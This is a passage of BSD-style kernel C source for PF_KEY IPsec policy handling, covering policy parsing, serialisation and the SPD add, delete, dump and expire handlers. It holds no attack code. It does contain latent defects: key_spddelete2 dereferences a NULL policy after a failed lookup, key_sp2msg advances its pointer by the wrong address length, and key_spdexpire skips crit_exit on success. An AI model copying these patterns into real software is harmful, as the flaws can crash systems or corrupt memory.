				if (xisr->sadb_x_ipsecrequest_reqid
						> IPSEC_MANUAL_REQID_MAX) {
					ipseclog((LOG_DEBUG,
					    "key_msg2sp: reqid=%d range "
					    "violation, updated by kernel.\n",
					    xisr->sadb_x_ipsecrequest_reqid));
					xisr->sadb_x_ipsecrequest_reqid = 0;
				}

				/* allocate new reqid id if reqid is zero. */
				if (xisr->sadb_x_ipsecrequest_reqid == 0) {
					u_int32_t reqid;
					if ((reqid = key_newreqid()) == 0) {
						KEY_FREESP(&newsp);
						*error = ENOBUFS;
						return NULL;
					}
					(*p_isr)->saidx.reqid = reqid;
					xisr->sadb_x_ipsecrequest_reqid = reqid;
				} else {
				/* set it for manual keying. */
					(*p_isr)->saidx.reqid =
						xisr->sadb_x_ipsecrequest_reqid;
				}
				break;

			default:
				ipseclog((LOG_DEBUG, "key_msg2sp: invalid level=%u\n",
					xisr->sadb_x_ipsecrequest_level));
				KEY_FREESP(&newsp);
				*error = EINVAL;
				return NULL;
			}
			(*p_isr)->level = xisr->sadb_x_ipsecrequest_level;

			/* set IP addresses if there */
			if (xisr->sadb_x_ipsecrequest_len > sizeof(*xisr)) {
				struct sockaddr *paddr;

				paddr = (struct sockaddr *)(xisr + 1);

				/* validity check */
				if (paddr->sa_len
				    > sizeof((*p_isr)->saidx.src)) {
					ipseclog((LOG_DEBUG, "key_msg2sp: invalid request "
						"address length.\n"));
					KEY_FREESP(&newsp);
					*error = EINVAL;
					return NULL;
				}
				bcopy(paddr, &(*p_isr)->saidx.src,
					paddr->sa_len);

				paddr = (struct sockaddr *)((caddr_t)paddr
							+ paddr->sa_len);

				/* validity check */
				if (paddr->sa_len
				    > sizeof((*p_isr)->saidx.dst)) {
					ipseclog((LOG_DEBUG, "key_msg2sp: invalid request "
						"address length.\n"));
					KEY_FREESP(&newsp);
					*error = EINVAL;
					return NULL;
				}
				bcopy(paddr, &(*p_isr)->saidx.dst,
					paddr->sa_len);
			}

			(*p_isr)->sav = NULL;
			(*p_isr)->sp = newsp;

			/* initialization for the next. */
			p_isr = &(*p_isr)->next;
			tlen -= xisr->sadb_x_ipsecrequest_len;

			/* validity check */
			if (tlen < 0) {
				ipseclog((LOG_DEBUG, "key_msg2sp: becoming tlen < 0.\n"));
				KEY_FREESP(&newsp);
				*error = EINVAL;
				return NULL;
			}

			xisr = (struct sadb_x_ipsecrequest *)((caddr_t)xisr
			                 + xisr->sadb_x_ipsecrequest_len);
		}
	    }
		break;
	default:
		ipseclog((LOG_DEBUG, "key_msg2sp: invalid policy type.\n"));
		KEY_FREESP(&newsp);
		*error = EINVAL;
		return NULL;
	}

	*error = 0;
	return newsp;
}

static u_int32_t
key_newreqid(void)
{
	/* Monotonic allocator above the manual-keying reqid range. */
	static u_int32_t auto_reqid = IPSEC_MANUAL_REQID_MAX + 1;

	auto_reqid = (auto_reqid == ~0
			? IPSEC_MANUAL_REQID_MAX + 1 : auto_reqid + 1);

	/* XXX should be unique check */

	return auto_reqid;
}

/*
 * copy secpolicy struct to sadb_x_policy structure indicated.
 */
struct mbuf *
key_sp2msg(struct secpolicy *sp)
{
	struct sadb_x_policy *xpl;
	int tlen;
	caddr_t p;
	struct mbuf *m;

	/* sanity check.
*/ if (sp == NULL) panic("key_sp2msg: NULL pointer was passed.\n"); tlen = key_getspreqmsglen(sp); m = key_alloc_mbuf(tlen); if (!m || m->m_next) { /*XXX*/ if (m) m_freem(m); return NULL; } m->m_len = tlen; m->m_next = NULL; xpl = mtod(m, struct sadb_x_policy *); bzero(xpl, tlen); xpl->sadb_x_policy_len = PFKEY_UNIT64(tlen); xpl->sadb_x_policy_exttype = SADB_X_EXT_POLICY; xpl->sadb_x_policy_type = sp->policy; xpl->sadb_x_policy_dir = sp->spidx.dir; xpl->sadb_x_policy_id = sp->id; p = (caddr_t)xpl + sizeof(*xpl); /* if is the policy for ipsec ? */ if (sp->policy == IPSEC_POLICY_IPSEC) { struct sadb_x_ipsecrequest *xisr; struct ipsecrequest *isr; for (isr = sp->req; isr != NULL; isr = isr->next) { xisr = (struct sadb_x_ipsecrequest *)p; xisr->sadb_x_ipsecrequest_proto = isr->saidx.proto; xisr->sadb_x_ipsecrequest_mode = isr->saidx.mode; xisr->sadb_x_ipsecrequest_level = isr->level; xisr->sadb_x_ipsecrequest_reqid = isr->saidx.reqid; p += sizeof(*xisr); bcopy(&isr->saidx.src, p, isr->saidx.src.sa.sa_len); p += isr->saidx.src.sa.sa_len; bcopy(&isr->saidx.dst, p, isr->saidx.dst.sa.sa_len); p += isr->saidx.src.sa.sa_len; xisr->sadb_x_ipsecrequest_len = PFKEY_ALIGN8(sizeof(*xisr) + isr->saidx.src.sa.sa_len + isr->saidx.dst.sa.sa_len); } } return m; } /* m will not be freed nor modified */ static struct mbuf * key_gather_mbuf(struct mbuf *m, const struct sadb_msghdr *mhp, int ndeep, int nitem, ...) 
{
	__va_list ap;
	int idx;
	int i;
	struct mbuf *result = NULL, *n;
	int len;

	if (m == NULL || mhp == NULL)
		panic("null pointer passed to key_gather");

	/*
	 * For each requested extension index: SADB_EXT_RESERVED copies the
	 * base sadb_msg header; the first 'ndeep' items are deep-copied
	 * into writable mbufs; the rest are shared via m_copym().
	 */
	__va_start(ap, nitem);
	for (i = 0; i < nitem; i++) {
		idx = __va_arg(ap, int);
		if (idx < 0 || idx > SADB_EXT_MAX)
			goto fail;
		/* don't attempt to pull empty extension */
		if (idx == SADB_EXT_RESERVED && mhp->msg == NULL)
			continue;
		if (idx != SADB_EXT_RESERVED &&
		    (mhp->ext[idx] == NULL || mhp->extlen[idx] == 0))
			continue;

		if (idx == SADB_EXT_RESERVED) {
			len = PFKEY_ALIGN8(sizeof(struct sadb_msg));
#ifdef DIAGNOSTIC
			if (len > MHLEN)
				panic("assumption failed");
#endif
			MGETHDR(n, MB_DONTWAIT, MT_DATA);
			if (!n)
				goto fail;
			n->m_len = len;
			n->m_next = NULL;
			m_copydata(m, 0, sizeof(struct sadb_msg),
			    mtod(n, caddr_t));
		} else if (i < ndeep) {
			len = mhp->extlen[idx];
			n = key_alloc_mbuf(len);
			if (!n || n->m_next) {	/*XXX*/
				if (n)
					m_freem(n);
				goto fail;
			}
			m_copydata(m, mhp->extoff[idx], mhp->extlen[idx],
			    mtod(n, caddr_t));
		} else {
			n = m_copym(m, mhp->extoff[idx], mhp->extlen[idx],
			    MB_DONTWAIT);
		}
		if (n == NULL)
			goto fail;

		if (result)
			m_cat(result, n);
		else
			result = n;
	}
	__va_end(ap);

	/*
	 * Fix: 'result' stays NULL when every requested extension was
	 * skipped; the old code dereferenced it unconditionally here.
	 */
	if (result != NULL && (result->m_flags & M_PKTHDR))
		result->m_pkthdr.len = m_lengthm(result, NULL);

	return result;

fail:
	m_freem(result);
	return NULL;
}

/*
 * SADB_X_SPDADD, SADB_X_SPDSETIDX or SADB_X_SPDUPDATE processing
 * add an entry to SP database, when received
 *   <base, address(SD), (lifetime(H),) policy>
 * from the user(?).
 * Adding to SP database,
 * and send
 *   <base, address(SD), (lifetime(H),) policy>
 * to the socket which was send.
 *
 * SPDADD set a unique policy entry.
 * SPDSETIDX like SPDADD without a part of policy requests.
 * SPDUPDATE replace a unique policy entry.
 *
 * m will always be freed.
*/ static int key_spdadd(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct sadb_address *src0, *dst0; struct sadb_x_policy *xpl0, *xpl; struct sadb_lifetime *lft = NULL; struct secpolicyindex spidx; struct secpolicy *newsp; struct sockaddr *saddr, *daddr; int error; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_spdadd: NULL pointer is passed.\n"); if (mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL || mhp->ext[SADB_EXT_ADDRESS_DST] == NULL || mhp->ext[SADB_X_EXT_POLICY] == NULL) { ipseclog((LOG_DEBUG, "key_spdadd: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) || mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address) || mhp->extlen[SADB_X_EXT_POLICY] < sizeof(struct sadb_x_policy)) { ipseclog((LOG_DEBUG, "key_spdadd: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->ext[SADB_EXT_LIFETIME_HARD] != NULL) { if (mhp->extlen[SADB_EXT_LIFETIME_HARD] < sizeof(struct sadb_lifetime)) { ipseclog((LOG_DEBUG, "key_spdadd: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } lft = (struct sadb_lifetime *)mhp->ext[SADB_EXT_LIFETIME_HARD]; } src0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_SRC]; dst0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_DST]; xpl0 = (struct sadb_x_policy *)mhp->ext[SADB_X_EXT_POLICY]; /* make secindex */ /* XXX boundary check against sa_len */ KEY_SETSECSPIDX(xpl0->sadb_x_policy_dir, src0 + 1, dst0 + 1, src0->sadb_address_prefixlen, dst0->sadb_address_prefixlen, src0->sadb_address_proto, &spidx); /* checking the direciton. */ switch (xpl0->sadb_x_policy_dir) { case IPSEC_DIR_INBOUND: case IPSEC_DIR_OUTBOUND: break; default: ipseclog((LOG_DEBUG, "key_spdadd: Invalid SP direction.\n")); mhp->msg->sadb_msg_errno = EINVAL; return 0; } /* check policy */ /* key_spdadd() accepts DISCARD, NONE and IPSEC. 
 */
	if (xpl0->sadb_x_policy_type == IPSEC_POLICY_ENTRUST ||
	    xpl0->sadb_x_policy_type == IPSEC_POLICY_BYPASS) {
		ipseclog((LOG_DEBUG, "key_spdadd: Invalid policy type.\n"));
		return key_senderror(so, m, EINVAL);
	}

	/* policy requests are mandatory when action is ipsec. */
	if (mhp->msg->sadb_msg_type != SADB_X_SPDSETIDX &&
	    xpl0->sadb_x_policy_type == IPSEC_POLICY_IPSEC &&
	    mhp->extlen[SADB_X_EXT_POLICY] <= sizeof(*xpl0)) {
		ipseclog((LOG_DEBUG, "key_spdadd: some policy requests part required.\n"));
		return key_senderror(so, m, EINVAL);
	}

	/*
	 * checking there is SP already or not.
	 * SPDUPDATE doesn't depend on whether there is a SP or not.
	 * If the type is either SPDADD or SPDSETIDX AND a SP is found,
	 * then error.
	 */
	newsp = key_getsp(&spidx);
	if (mhp->msg->sadb_msg_type == SADB_X_SPDUPDATE) {
		/* SPDUPDATE: kill any existing entry, then fall through. */
		if (newsp) {
			newsp->state = IPSEC_SPSTATE_DEAD;
			KEY_FREESP(&newsp);
		}
	} else {
		if (newsp != NULL) {
			KEY_FREESP(&newsp);
			ipseclog((LOG_DEBUG, "key_spdadd: a SP entry exists already.\n"));
			return key_senderror(so, m, EEXIST);
		}
	}

	/* allocation new SP entry */
	if ((newsp = key_msg2sp(xpl0, PFKEY_EXTLEN(xpl0), &error)) == NULL) {
		return key_senderror(so, m, error);
	}

	if ((newsp->id = key_getnewspid()) == 0) {
		KFREE(newsp);
		return key_senderror(so, m, ENOBUFS);
	}

	/* XXX boundary check against sa_len */
	KEY_SETSECSPIDX(xpl0->sadb_x_policy_dir,
	                src0 + 1,
	                dst0 + 1,
	                src0->sadb_address_prefixlen,
	                dst0->sadb_address_prefixlen,
	                src0->sadb_address_proto,
	                &newsp->spidx);

	/* sanity check on addr pair */
	saddr = (struct sockaddr *)(src0 + 1);
	daddr = (struct sockaddr *)(dst0 + 1);
	if (saddr->sa_family != daddr->sa_family) {
		KFREE(newsp);
		return key_senderror(so, m, EINVAL);
	}
	if (saddr->sa_len != daddr->sa_len) {
		KFREE(newsp);
		return key_senderror(so, m, EINVAL);
	}
#if 1
	/* Policy addresses must agree with the request's SA index family. */
	if (newsp->req && newsp->req->saidx.src.sa.sa_family) {
		if (saddr->sa_family != newsp->req->saidx.src.sa.sa_family) {
			KFREE(newsp);
			return key_senderror(so, m, EINVAL);
		}
	}
	if (newsp->req && newsp->req->saidx.dst.sa.sa_family) {
		if (daddr->sa_family != newsp->req->saidx.dst.sa.sa_family) {
			KFREE(newsp);
			return key_senderror(so, m, EINVAL);
		}
	}
#endif

	newsp->created = time_second;
	newsp->lastused = newsp->created;
	newsp->lifetime = lft ? lft->sadb_lifetime_addtime : 0;
	newsp->validtime = lft ? lft->sadb_lifetime_usetime : 0;

	newsp->refcnt = 1;	/* do not reclaim until I say I do */
	newsp->state = IPSEC_SPSTATE_ALIVE;
	LIST_INSERT_TAIL(&sptree[newsp->spidx.dir], newsp, secpolicy, chain);

	/* delete the entry in spacqtree */
	if (mhp->msg->sadb_msg_type == SADB_X_SPDUPDATE) {
		struct secspacq *spacq;
		if ((spacq = key_getspacq(&spidx)) != NULL) {
			/* reset counter in order to deletion by timehandler. */
			spacq->created = time_second;
			spacq->count = 0;
		}
	}

    {
	/*
	 * Build the reply from the request's own extensions (deep-copying
	 * the first two so the header can be edited), patch in the newly
	 * assigned policy id, and broadcast it to all PF_KEY listeners.
	 */
	struct mbuf *n, *mpolicy;
	struct sadb_msg *newmsg;
	int off;

	/* create new sadb_msg to reply. */
	if (lft) {
		n = key_gather_mbuf(m, mhp, 2, 5, SADB_EXT_RESERVED,
		    SADB_X_EXT_POLICY, SADB_EXT_LIFETIME_HARD,
		    SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST);
	} else {
		n = key_gather_mbuf(m, mhp, 2, 4, SADB_EXT_RESERVED,
		    SADB_X_EXT_POLICY,
		    SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST);
	}
	if (!n)
		return key_senderror(so, m, ENOBUFS);

	if (n->m_len < sizeof(*newmsg)) {
		n = m_pullup(n, sizeof(*newmsg));
		if (!n)
			return key_senderror(so, m, ENOBUFS);
	}
	newmsg = mtod(n, struct sadb_msg *);
	newmsg->sadb_msg_errno = 0;
	newmsg->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len);

	off = 0;
	mpolicy = m_pulldown(n, PFKEY_ALIGN8(sizeof(struct sadb_msg)),
	    sizeof(*xpl), &off);
	if (mpolicy == NULL) {
		/* n is already freed */
		return key_senderror(so, m, ENOBUFS);
	}
	xpl = (struct sadb_x_policy *)(mtod(mpolicy, caddr_t) + off);
	if (xpl->sadb_x_policy_exttype != SADB_X_EXT_POLICY) {
		m_freem(n);
		return key_senderror(so, m, EINVAL);
	}
	xpl->sadb_x_policy_id = newsp->id;

	m_freem(m);
	return key_sendup_mbuf(so, n, KEY_SENDUP_ALL);
    }
}

/*
 * get new policy id.
 * OUT:
 *	0:	failure.
 *	others: success.
*/ static u_int32_t key_getnewspid(void) { u_int32_t newid = 0; int count = key_spi_trycnt; /* XXX */ struct secpolicy *sp; /* when requesting to allocate spi ranged */ while (count--) { newid = (policy_id = (policy_id == ~0 ? 1 : policy_id + 1)); if ((sp = key_getspbyid(newid)) == NULL) break; KEY_FREESP(&sp); } if (count == 0 || newid == 0) { ipseclog((LOG_DEBUG, "key_getnewspid: to allocate policy id is failed.\n")); return 0; } return newid; } /* * SADB_SPDDELETE processing * receive * <base, address(SD), policy(*)> * from the user(?), and set SADB_SASTATE_DEAD, * and send, * <base, address(SD), policy(*)> * to the ikmpd. * policy(*) including direction of policy. * * m will always be freed. */ static int key_spddelete(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct sadb_address *src0, *dst0; struct sadb_x_policy *xpl0; struct secpolicyindex spidx; struct secpolicy *sp; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_spddelete: NULL pointer is passed.\n"); if (mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL || mhp->ext[SADB_EXT_ADDRESS_DST] == NULL || mhp->ext[SADB_X_EXT_POLICY] == NULL) { ipseclog((LOG_DEBUG, "key_spddelete: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) || mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address) || mhp->extlen[SADB_X_EXT_POLICY] < sizeof(struct sadb_x_policy)) { ipseclog((LOG_DEBUG, "key_spddelete: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } src0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_SRC]; dst0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_DST]; xpl0 = (struct sadb_x_policy *)mhp->ext[SADB_X_EXT_POLICY]; /* make secindex */ /* XXX boundary check against sa_len */ KEY_SETSECSPIDX(xpl0->sadb_x_policy_dir, src0 + 1, dst0 + 1, src0->sadb_address_prefixlen, dst0->sadb_address_prefixlen, src0->sadb_address_proto, &spidx); /* 
checking the direciton. */ switch (xpl0->sadb_x_policy_dir) { case IPSEC_DIR_INBOUND: case IPSEC_DIR_OUTBOUND: break; default: ipseclog((LOG_DEBUG, "key_spddelete: Invalid SP direction.\n")); return key_senderror(so, m, EINVAL); } /* Is there SP in SPD ? */ if ((sp = key_getsp(&spidx)) == NULL) { ipseclog((LOG_DEBUG, "key_spddelete: no SP found.\n")); return key_senderror(so, m, EINVAL); } /* save policy id to buffer to be returned. */ xpl0->sadb_x_policy_id = sp->id; sp->state = IPSEC_SPSTATE_DEAD; KEY_FREESP(&sp); { struct mbuf *n; struct sadb_msg *newmsg; /* create new sadb_msg to reply. */ n = key_gather_mbuf(m, mhp, 1, 4, SADB_EXT_RESERVED, SADB_X_EXT_POLICY, SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST); if (!n) return key_senderror(so, m, ENOBUFS); newmsg = mtod(n, struct sadb_msg *); newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len); m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ALL); } } /* * SADB_SPDDELETE2 processing * receive * <base, policy(*)> * from the user(?), and set SADB_SASTATE_DEAD, * and send, * <base, policy(*)> * to the ikmpd. * policy(*) including direction of policy. * * m will always be freed. */ static int key_spddelete2(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { u_int32_t id; struct secpolicy *sp; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_spddelete2: NULL pointer is passed.\n"); if (mhp->ext[SADB_X_EXT_POLICY] == NULL || mhp->extlen[SADB_X_EXT_POLICY] < sizeof(struct sadb_x_policy)) { ipseclog((LOG_DEBUG, "key_spddelete2: invalid message is passed.\n")); key_senderror(so, m, EINVAL); return 0; } id = ((struct sadb_x_policy *)mhp->ext[SADB_X_EXT_POLICY])->sadb_x_policy_id; /* Is there SP in SPD ? 
*/ if ((sp = key_getspbyid(id)) == NULL) { ipseclog((LOG_DEBUG, "key_spddelete2: no SP found id:%u.\n", id)); key_senderror(so, m, EINVAL); } sp->state = IPSEC_SPSTATE_DEAD; KEY_FREESP(&sp); { struct mbuf *n; struct sadb_msg *newmsg; int off, len; /* create new sadb_msg to reply. */ len = PFKEY_ALIGN8(sizeof(struct sadb_msg)); if (len > MCLBYTES) return key_senderror(so, m, ENOBUFS); n = m_getb(len, MB_DONTWAIT, MT_DATA, M_PKTHDR); if (!n) return key_senderror(so, m, ENOBUFS); n->m_len = len; m_copydata(m, 0, sizeof(struct sadb_msg), mtod(n, caddr_t)); off = PFKEY_ALIGN8(sizeof(struct sadb_msg)); #ifdef DIAGNOSTIC if (off != len) panic("length inconsistency in key_spddelete2"); #endif n->m_next = m_copym(m, mhp->extoff[SADB_X_EXT_POLICY], mhp->extlen[SADB_X_EXT_POLICY], MB_DONTWAIT); if (!n->m_next) { m_freem(n); return key_senderror(so, m, ENOBUFS); } n->m_pkthdr.len = m_lengthm(n, NULL); newmsg = mtod(n, struct sadb_msg *); newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len); m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ALL); } } /* * SADB_X_GET processing * receive * <base, policy(*)> * from the user(?), * and send, * <base, address(SD), policy> * to the ikmpd. * policy(*) including direction of policy. * * m will always be freed. */ static int key_spdget(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { u_int32_t id; struct secpolicy *sp; struct mbuf *n; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_spdget: NULL pointer is passed.\n"); if (mhp->ext[SADB_X_EXT_POLICY] == NULL || mhp->extlen[SADB_X_EXT_POLICY] < sizeof(struct sadb_x_policy)) { ipseclog((LOG_DEBUG, "key_spdget: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } id = ((struct sadb_x_policy *)mhp->ext[SADB_X_EXT_POLICY])->sadb_x_policy_id; /* Is there SP in SPD ? 
*/ if ((sp = key_getspbyid(id)) == NULL) { ipseclog((LOG_DEBUG, "key_spdget: no SP found id:%u.\n", id)); return key_senderror(so, m, ENOENT); } n = key_setdumpsp(sp, SADB_X_SPDGET, 0, mhp->msg->sadb_msg_pid); if (n != NULL) { m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ONE); } else return key_senderror(so, m, ENOBUFS); } /* * SADB_X_SPDACQUIRE processing. * Acquire policy and SA(s) for a *OUTBOUND* packet. * send * <base, policy(*)> * to KMD, and expect to receive * <base> with SADB_X_SPDACQUIRE if error occured, * or * <base, policy> * with SADB_X_SPDUPDATE from KMD by PF_KEY. * policy(*) is without policy requests. * * 0 : succeed * others: error number */ int key_spdacquire(struct secpolicy *sp) { struct mbuf *result = NULL, *m; struct secspacq *newspacq; int error; /* sanity check */ if (sp == NULL) panic("key_spdacquire: NULL pointer is passed.\n"); if (sp->req != NULL) panic("key_spdacquire: called but there is request.\n"); if (sp->policy != IPSEC_POLICY_IPSEC) panic("key_spdacquire: policy mismatched. IPsec is expected.\n"); /* Get an entry to check whether sent message or not. */ if ((newspacq = key_getspacq(&sp->spidx)) != NULL) { if (key_blockacq_count < newspacq->count) { /* reset counter and do send message. */ newspacq->count = 0; } else { /* increment counter and do nothing. */ newspacq->count++; return 0; } } else { /* make new entry for blocking to send SADB_ACQUIRE. */ if ((newspacq = key_newspacq(&sp->spidx)) == NULL) return ENOBUFS; /* add to acqtree */ LIST_INSERT_HEAD(&spacqtree, newspacq, chain); } /* create new sadb_msg to reply. 
*/ m = key_setsadbmsg(SADB_X_SPDACQUIRE, 0, 0, 0, 0, 0); if (!m) { error = ENOBUFS; goto fail; } result = m; result->m_pkthdr.len = m_lengthm(result, NULL); mtod(result, struct sadb_msg *)->sadb_msg_len = PFKEY_UNIT64(result->m_pkthdr.len); return key_sendup_mbuf(NULL, m, KEY_SENDUP_REGISTERED); fail: if (result) m_freem(result); return error; } /* * SADB_SPDFLUSH processing * receive * <base> * from the user, and free all entries in secpctree. * and send, * <base> * to the user. * NOTE: what to do is only marking SADB_SASTATE_DEAD. * * m will always be freed. */ static int key_spdflush(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct sadb_msg *newmsg; struct secpolicy *sp; u_int dir; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_spdflush: NULL pointer is passed.\n"); if (m->m_len != PFKEY_ALIGN8(sizeof(struct sadb_msg))) return key_senderror(so, m, EINVAL); for (dir = 0; dir < IPSEC_DIR_MAX; dir++) { LIST_FOREACH(sp, &sptree[dir], chain) { sp->state = IPSEC_SPSTATE_DEAD; } } if (sizeof(struct sadb_msg) > m->m_len + M_TRAILINGSPACE(m)) { ipseclog((LOG_DEBUG, "key_spdflush: No more memory.\n")); return key_senderror(so, m, ENOBUFS); } if (m->m_next) m_freem(m->m_next); m->m_next = NULL; m->m_pkthdr.len = m->m_len = PFKEY_ALIGN8(sizeof(struct sadb_msg)); newmsg = mtod(m, struct sadb_msg *); newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(m->m_pkthdr.len); return key_sendup_mbuf(so, m, KEY_SENDUP_ALL); } /* * SADB_SPDDUMP processing * receive * <base> * from the user, and dump all SP leaves * and send, * <base> ..... * to the ikmpd. * * m will always be freed. */ static int key_spddump(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct secpolicy *sp; int cnt; u_int dir; struct mbuf *n; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_spddump: NULL pointer is passed.\n"); /* search SPD entry and get buffer size. 
*/ cnt = 0; for (dir = 0; dir < IPSEC_DIR_MAX; dir++) { LIST_FOREACH(sp, &sptree[dir], chain) { cnt++; } } if (cnt == 0) return key_senderror(so, m, ENOENT); for (dir = 0; dir < IPSEC_DIR_MAX; dir++) { LIST_FOREACH(sp, &sptree[dir], chain) { --cnt; n = key_setdumpsp(sp, SADB_X_SPDDUMP, cnt, mhp->msg->sadb_msg_pid); if (n) key_sendup_mbuf(so, n, KEY_SENDUP_ONE); } } m_freem(m); return 0; } static struct mbuf * key_setdumpsp(struct secpolicy *sp, u_int8_t type, u_int32_t seq, u_int32_t pid) { struct mbuf *result = NULL, *m; m = key_setsadbmsg(type, 0, SADB_SATYPE_UNSPEC, seq, pid, sp->refcnt); if (!m) goto fail; result = m; m = key_setsadbaddr(SADB_EXT_ADDRESS_SRC, &sp->spidx.src.sa, sp->spidx.prefs, sp->spidx.ul_proto); if (!m) goto fail; m_cat(result, m); m = key_setsadbaddr(SADB_EXT_ADDRESS_DST, &sp->spidx.dst.sa, sp->spidx.prefd, sp->spidx.ul_proto); if (!m) goto fail; m_cat(result, m); m = key_sp2msg(sp); if (!m) goto fail; m_cat(result, m); if ((result->m_flags & M_PKTHDR) == 0) goto fail; if (result->m_len < sizeof(struct sadb_msg)) { result = m_pullup(result, sizeof(struct sadb_msg)); if (result == NULL) goto fail; } result->m_pkthdr.len = m_lengthm(result, NULL); mtod(result, struct sadb_msg *)->sadb_msg_len = PFKEY_UNIT64(result->m_pkthdr.len); return result; fail: m_freem(result); return NULL; } /* * get PFKEY message length for security policy and request. */ static u_int key_getspreqmsglen(struct secpolicy *sp) { struct ipsecrequest *isr; u_int tlen, len; tlen = sizeof(struct sadb_x_policy); /* if is the policy for ipsec ? */ if (sp->policy != IPSEC_POLICY_IPSEC) return tlen; /* get length of ipsec requests */ for (isr = sp->req; isr != NULL; isr = isr->next) { len = sizeof(struct sadb_x_ipsecrequest) + isr->saidx.src.sa.sa_len + isr->saidx.dst.sa.sa_len; tlen += PFKEY_ALIGN8(len); } return tlen; } /* * SADB_SPDEXPIRE processing * send * <base, address(SD), lifetime(CH), policy> * to KMD by PF_KEY. 
* * OUT: 0 : succeed * others : error number */ static int key_spdexpire(struct secpolicy *sp) { struct mbuf *result = NULL, *m; int len; int error = -1; struct sadb_lifetime *lt; /* XXX: Why do we lock ? */ crit_enter(); /* sanity check */ if (sp == NULL) panic("key_spdexpire: NULL pointer is passed.\n"); /* set msg header */ m = key_setsadbmsg(SADB_X_SPDEXPIRE, 0, 0, 0, 0, 0); if (!m) { error = ENOBUFS; goto fail; } result = m; /* create lifetime extension (current and hard) */ len = PFKEY_ALIGN8(sizeof(*lt)) * 2; m = key_alloc_mbuf(len); if (!m || m->m_next) { /*XXX*/ if (m) m_freem(m); error = ENOBUFS; goto fail; } bzero(mtod(m, caddr_t), len); lt = mtod(m, struct sadb_lifetime *); lt->sadb_lifetime_len = PFKEY_UNIT64(sizeof(struct sadb_lifetime)); lt->sadb_lifetime_exttype = SADB_EXT_LIFETIME_CURRENT; lt->sadb_lifetime_allocations = 0; lt->sadb_lifetime_bytes = 0; lt->sadb_lifetime_addtime = sp->created; lt->sadb_lifetime_usetime = sp->lastused; lt = (struct sadb_lifetime *)(mtod(m, caddr_t) + len / 2); lt->sadb_lifetime_len = PFKEY_UNIT64(sizeof(struct sadb_lifetime)); lt->sadb_lifetime_exttype = SADB_EXT_LIFETIME_HARD; lt->sadb_lifetime_allocations = 0; lt->sadb_lifetime_bytes = 0; lt->sadb_lifetime_addtime = sp->lifetime; lt->sadb_lifetime_usetime = sp->validtime; m_cat(result, m); /* set sadb_address for source */ m = key_setsadbaddr(SADB_EXT_ADDRESS_SRC, &sp->spidx.src.sa, sp->spidx.prefs, sp->spidx.ul_proto); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); /* set sadb_address for destination */ m = key_setsadbaddr(SADB_EXT_ADDRESS_DST, &sp->spidx.dst.sa, sp->spidx.prefd, sp->spidx.ul_proto); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); /* set secpolicy */ m = key_sp2msg(sp); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); if ((result->m_flags & M_PKTHDR) == 0) { error = EINVAL; goto fail; } if (result->m_len < sizeof(struct sadb_msg)) { result = m_pullup(result, sizeof(struct sadb_msg)); if (result == NULL) { error = 
ENOBUFS; goto fail; } } result->m_pkthdr.len = m_lengthm(result, NULL); mtod(result, struct sadb_msg *)->sadb_msg_len = PFKEY_UNIT64(result->m_pkthdr.len); return key_sendup_mbuf(NULL, result, KEY_SENDUP_REGISTERED); fail: if (result) m_freem(result); crit_exit(); return error; } /* %%% SAD management */ /* * allocating a memory for new SA head, and copy from the values of mhp. * OUT: NULL : failure due to the lack of memory. * others : pointer to new SA head. */ static struct secashead * key_newsah(struct secasindex *saidx) { struct secashead *newsah; KASSERT(saidx != NULL, ("key_newsaidx: null saidx")); newsah = kmalloc(sizeof(struct secashead), M_SECA, M_INTWAIT | M_ZERO | M_NULLOK); if (newsah != NULL) { int i; for (i = 0; i < NELEM(newsah->savtree); i++) LIST_INIT(&newsah->savtree[i]); newsah->saidx = *saidx; /* add to saidxtree */ newsah->state = SADB_SASTATE_MATURE; LIST_INSERT_HEAD(&sahtree, newsah, chain); } return(newsah); } /* * Delete SA index and all registered 